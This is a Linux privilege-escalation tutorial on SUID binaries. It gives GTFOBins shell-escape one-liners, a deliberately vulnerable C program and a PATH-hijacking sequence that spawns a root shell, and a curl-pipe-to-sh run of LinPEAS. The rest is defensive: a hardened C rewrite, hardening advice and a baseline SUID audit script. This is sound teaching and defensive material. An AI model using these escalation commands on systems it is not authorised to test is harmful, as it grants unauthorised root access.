SUID Binary Exploitation for Linux Privilege Escalation
SUID (Set User ID) binaries run with the permissions of the file owner, typically root. Misconfigured SUID binaries are a common privilege escalation vector in Linux environments.
Finding SUID Binaries
# Find all SUID binaries on the system
find / -perm -4000 -type f 2>/dev/null
# Find with detailed output (the ; terminating -exec must be escaped from the shell)
find / -perm -u=s -type f -exec ls -la {} \; 2>/dev/null
Common Exploitable Binaries (GTFOBins)
# Python SUID
python3 -c 'import os; os.execl("/bin/sh", "sh", "-p")'
# Find with SUID
find . -exec /bin/sh -p \; -quit
# Vim with SUID
vim -c ':!/bin/sh'
# Nmap (older versions)
nmap --interactive
nmap> !sh
Custom SUID Binary Exploitation
// Vulnerable SUID binary: calls system() without a full path
#include <stdio.h>
#include <stdlib.h>

int main(void) {
    // system() runs "/bin/sh -c 'cat /var/log/syslog'"; the shell resolves
    // "cat" through the caller's PATH, so PATH hijacking is possible here
    system("cat /var/log/syslog");
    return 0;
}
# PATH hijacking attack
echo '/bin/bash -p' > /tmp/cat
chmod +x /tmp/cat
export PATH=/tmp:$PATH
./vulnerable_binary # Spawns root shell
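The fix for the binary above is not to sanitise PATH inside system() but to stop depending on the caller's environment at all. The following is an added example, not code from the page: a hardened counterpart that executes a hard-coded absolute path through fork/execve with a fixed environment, so no shell is involved and neither PATH nor any other inherited variable influences which program runs as root. The helper names `is_absolute_path` and `run_fixed` are this example's own.

```c
// Added example (not from the page): hardened counterpart of the vulnerable
// binary above. Instead of system("cat ..."), it execs an absolute path with a
// fixed environment, so neither PATH nor other inherited variables influence
// which program runs as root.
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/wait.h>

/* The whole PATH-hijacking class relies on relative lookup, so refuse
 * anything that is not an absolute path. */
int is_absolute_path(const char *path)
{
    return path != NULL && path[0] == '/';
}

/* Run `path` with `argv` under a minimal, caller-independent environment.
 * Returns the child's exit status (127 if the exec itself failed), or -1
 * when the path is not absolute or fork/waitpid fail. No shell is involved,
 * so nothing here is re-parsed or looked up through PATH. */
int run_fixed(const char *path, char *const argv[])
{
    /* Fixed environment: the caller's environ is never passed on. */
    static char *const safe_env[] = { "PATH=/usr/bin:/bin", NULL };

    if (!is_absolute_path(path))
        return -1;

    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        execve(path, argv, safe_env);
        _exit(127); /* only reached if execve failed */
    }

    int status;
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void)
{
    /* Same job as the vulnerable binary, but by absolute path and without
     * /bin/sh. The argv strings are compile-time constants. */
    char *const argv[] = { "cat", "/var/log/syslog", NULL };
    int rc = run_fixed("/bin/cat", argv);
    if (rc != 0)
        fprintf(stderr, "cat failed with status %d\n", rc);
    return rc == 0 ? 0 : 1;
}
```

Two details worth knowing when reviewing SUID code: the dynamic loader already ignores LD_PRELOAD and LD_LIBRARY_PATH for set-user-ID processes, but PATH is passed through untouched, which is exactly why a system() call with a bare command name is exploitable. And if root is only needed for one operation, dropping to the real UID with setresuid() before the exec removes the value of the target even when a lookup bug slips through.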
Automated Enumeration
# Use LinPEAS for automated PrivEsc checks
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh
# Use LinEnum
wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
chmod +x LinEnum.sh && ./LinEnum.sh
Defenses
- Audit SUID binaries regularly: find / -perm -4000 2>/dev/null
- Remove the SUID bit from non-essential binaries: chmod u-s /path/to/binary
- Mount partitions with the nosuid flag where possible
- Use AppArmor or SELinux profiles to restrict SUID execution
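The find command from "Finding SUID Binaries" and the first and third Defenses items only become useful as a control when the output is compared against a known-good state. The script below is an added example, not from the page: it lists SUID files sorted for comparison, reports drift against a baseline file, and flags writable mounts that lack nosuid. The baseline path, the cron usage and the mount table are constructed for the example.

```sh
#!/bin/sh
# Added example (not from the page): a baseline-driven SUID audit plus a
# nosuid mount check, the "find" and "nosuid" items from the Defenses list
# turned into something cron can run. Paths and sample data below are
# constructed for the example.

# List regular files with the SUID bit under $1 (default /), one per line,
# sorted so two runs can be compared with comm(1). -xdev keeps find on one
# filesystem so /proc, /sys and network mounts are not walked.
list_suid() {
    suid_root="${1:-/}"
    find "$suid_root" -xdev -perm -4000 -type f 2>/dev/null | sort
}

# Compare the current SUID set under $2 (default /) with the baseline file $1.
# Prints "+ path" for SUID files not in the baseline and "- path" for baseline
# entries that disappeared. Exit status 1 when anything changed, 0 otherwise.
audit_suid() {
    suid_base="$1"
    suid_cur="$(mktemp)"
    list_suid "${2:-/}" > "$suid_cur"
    # comm -3 leaves baseline-only lines unindented and current-only lines
    # prefixed with a tab; awk turns that into "-" and "+" markers.
    suid_drift="$(comm -3 "$suid_base" "$suid_cur" \
        | awk -F'\t' '$1 == "" { print "+ " $2; next } { print "- " $1 }')"
    rm -f "$suid_cur"
    if [ -z "$suid_drift" ]; then
        return 0
    fi
    printf '%s\n' "$suid_drift"
    return 1
}

# Read /proc/mounts-style lines on stdin and print writable mount points that
# lack the nosuid option. The root filesystem is skipped because it cannot be
# mounted nosuid in practice; everything else printed is a candidate.
mounts_missing_nosuid() {
    awk '$2 != "/" && $4 ~ /(^|,)rw(,|$)/ && $4 !~ /(^|,)nosuid(,|$)/ { print $2 }'
}

# Constructed sample mount table for the nosuid check.
SAMPLE_MOUNTS='/dev/sda1 / ext4 rw,relatime 0 0
tmpfs /tmp tmpfs rw,nosuid,nodev 0 0
/dev/sdb1 /home ext4 rw,relatime 0 0
/dev/sr0 /media/cd iso9660 ro,relatime 0 0'

# Typical use: create the baseline once on a known-good host, then audit.
#   list_suid / > /var/lib/suid-baseline.txt
#   audit_suid /var/lib/suid-baseline.txt || logger -p auth.warning "SUID drift"
#   mounts_missing_nosuid < /proc/mounts
```

A new "+" line is the signal to investigate: either a package update legitimately added a SUID helper (update the baseline after checking it) or someone set the bit on a binary that should never carry it, which is the misconfiguration the rest of this page exploits.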

